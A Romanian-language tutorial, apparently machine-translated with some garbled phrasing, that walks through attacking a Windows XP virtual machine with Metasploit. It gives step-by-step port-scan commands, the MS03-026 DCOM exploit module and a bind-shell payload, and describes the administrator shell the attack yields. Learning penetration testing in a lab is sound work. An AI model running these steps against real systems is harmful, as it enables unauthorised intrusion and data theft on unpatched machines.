cum să Hack Windows XP-Windows XP este un sistem de operare vechi. De fapt, Microsoft a încetat să emită actualizări pentru acest sistem de operare. Cu toate acestea, mulți oameni încă folosesc XP pe computerele lor. Deoarece acest sistem de operare nu va primi actualizări viitoare, vulnerabilitățile sale existente vor fi disponibile pentru totdeauna hackerilor și testerilor de penetrare.
această secțiune vă va învăța cum să atacați Windows XP folosind cadrul Metasploit. Autorul presupune că utilizați Kali Linux și că aveți o mașină virtuală care rulează Windows XP. Mașinile virtuale vă permit să rulați mai multe sisteme de operare (în acest caz, Kali Linux și Windows XP) pe un singur computer. Există o mulțime de materiale de instruire cu privire la mașinile virtuale pe YouTube.
asigurați-vă că utilizați o mașină virtuală. Practicarea acestei tehnici de hacking pe un computer Real Windows XP poate duce la probleme grave. Dacă se întâmplă ceva rău pe o mașină virtuală, puteți să o reporniți apăsând câteva butoane. Busting un calculator XP real, pe de altă parte, poate duce la costurile de reparații.
cum să Hack Windows XP
trebuie să rupă într-o rețea înainte de hacking computerele legate de acesta. Cu toate acestea, această lecție nu necesită niciun atac de rețea. Asta pentru că sistemul de operare XP este instalat în computerul dvs. Astfel, mașina virtuală XP aparține rețelei dvs. de calculatoare.
pentru a hack un computer Windows XP, ar trebui:
- porniți cadrul Metasploit în sistemul de operare Kali Linux.
lansați un terminal și tastați:
service postgresql start
această comandă activează PostgreSQL pe computer. PostgreSQL servește ca bază de date a Metasploit, deci ar trebui să o rulați mai întâi înainte de a declanșa programul în sine. Acum, Tip:
service metasploit start
sau
msfconsole
dacă ați făcut totul bine, terminalul dvs. ar trebui să arate astfel:
- utilizați funcția” Scanare port ” a Metasploit pentru a găsi ținte.
cadrul Metasploit vine cu diverse instrumente auxiliare. Scanarea porturilor este unul dintre cele mai bune instrumente prezente în acest cadru. Acest instrument vă permite să scanați toate porturile unei mașini. Vă poate oferi informații detaliate despre porturile deschise ale țintei dvs. După cum știți, un port servește drept ușă pentru hackeri. Un port deschis este o ușă deschisă.
activați scanarea portului introducând această comandă:
use auxiliary/scanner/portscan/tcp
Afișați opțiunile de scanare disponibile tastând:
show options
în mod implicit, Port Scan va verifica Fiecare port prezent în sistem. Nu doriți ca acest lucru să se întâmple, deoarece întregul proces va dura mult timp. Cel mai bine ar fi să specificați intervalul de porturi care trebuie verificate. Iată un exemplu:
set ports 1-600
acum, trebuie să specificați adresa IP a țintei dvs. Acest pas este dificil, deoarece adresele IP pot varia. Pentru acest exemplu, trebuie să accesați mașina virtuală XP și să lansați un prompt de comandă. Tastați „ipconfig” și căutați adresa IP a mașinii. Să presupunem că adresa IP a mașinii dvs. virtuale este 192.168.62.122.
reveniți la sistemul de operare Kali și introduceți următoarele:
set RHOSTS 192.168.62.122
tastați” run ” pentru a începe procesul. Metasploit va afișa toate porturile deschise prezente în mașina dvs. virtuală. Dacă scanarea nu a afișat niciun port deschis, reveniți la sistemul de operare XP și dezactivați paravanul de protecție. Apoi, executați din nou scanarea. Să presupunem că scanarea a descoperit două porturi deschise: 135 și 445.
în practică, nu veți cunoaște adresa IP a țintei dvs. Asta înseamnă că trebuie să utilizați NMAP pentru a găsi ținte și adresele lor IP.
- căutați exploatări.
aceasta este una dintre cele mai importante faze ale atacului. Trebuie să găsiți un exploit care funcționează pe ținta aleasă. Ieșiți din scanerul portului tastând”înapoi”. În ecranul principal al msfconsole, tastați”căutare dcom”. Exploatarea „dcom” este unul dintre cele mai bune instrumente pe care le poate folosi pentru a hack un computer XP.
Metasploit vă va afișa rezultatele căutării. Căutați modulul numit” exploit/windows/dcerpc/ms03_026_dcom ” și copiați numele acestuia. Apoi, tastați următoarele:
use exploit/windows/dcerpc/ms03_026_dcom
Afișați opțiunile disponibile tastând:
show options
indicați adresa IP a țintei dvs. Iată codul:
set RHOST 192.168.62.122
alegeți sarcina utilă pentru atacul dvs. Sarcina utilă determină ce se va întâmpla odată ce ați încălcat apărarea țintei. Poate seta un terminal deschis sau poate planta un virus. Există mii de sarcini utile disponibile în cadrul Metasploit. Pentru a găsi sarcina utilă potrivită pentru atacul curent, tastați:
payloads
- sarcina utilă ideală pentru această lecție este „windows/shell_bind_tcp”. Această sarcină utilă deschide un shell (sau prompt de comandă) în țintă printr-un port TCP. Puteți seta această sarcină utilă tastând:
set PAYLOAD windows/shell_bind_tcp
- acum că ați specificat fiecare aspect al atacului, tastați „run”.
Metasploit vă va spune că un shell a fost deschis în computerul țintă. Shell-ul îți oferă privilegii de administrator asupra țintei tale. Puteți descărca fișiere de pe acel computer sau puteți trimite programe către acesta. De asemenea, puteți obține capturi de ecran ale computerului, dacă doriți.
Cum Să Hack Windows Xp Getastra Metoda